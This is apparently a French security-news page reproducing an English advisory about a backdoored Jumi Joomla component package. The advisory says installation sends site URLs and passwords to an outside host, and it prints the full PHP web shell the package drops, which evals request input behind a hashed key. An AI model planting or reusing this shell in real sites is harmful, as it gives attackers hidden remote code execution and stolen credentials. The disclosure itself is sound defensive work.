|
Voici la 189e page demandée aujourd'hui.
|
 |
|||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
|
|
|||||||
|
| |||||||
|
|
|
Exploits et Vulnérabilités logiciel sur ground418
|
||||||||||||||||||||||||||
|
Texte original (anglais) : Summary: another backdoored joomla component (yawn) Application: Jumi, a joomla component About Jumi: Jumi is the set of custom code extensions for Joomla! 1.0.x and 1.5.x in their native modes. Since 2006 more then 200.000 downloads. With Jumi you can include php, html, javascript scripts into the modules position, articles, category or section descriptions, or into your own custom made component pages. Fun snippet from the release_notes.txt: Changes: - Fixed: security vulnerability Vendor notified: *.cz .. I looked at the fun pictures on the "about us" screen, and left it at that. Joomla? A CC of this mail on their "STRIKE TEAM" form (are you afraid of e-mail gentlemen?) Download url/s: http://extensions.joomla.org/extensions/search/jumi http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53 http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53&func=startdown&id=56 md5sum: 1037de7cc97ba348440a93db1ee89400 jumi_pack_2.0.5_for_J1.5.zip The installation sends your joomla URL and passwords to http://my-wnl.org/index.php and drops the following file: modules/mod_mainmenu/tmpl/.config.php Which says that the loveless individual who did the backdooring doesn't like to share (c'mon man, give a bit): <?php if(empty ($_REQUEST['key']) || sha1(md5($_REQUEST['key']))!='0b6045b268cf676864a27d9663cee0a634431467'){header("HTTP/1.0 404 Not Found"); exit();} header("Content-Type: Text/Plain"); eval(stripslashes($_REQUEST['php'])); ?> abuse () ispgateway de: you are hosting the backdoor notification site | ||||||||||||||||||||||||||
| ||||||||||||||||||||||||||
| partenaires | |
| |
| |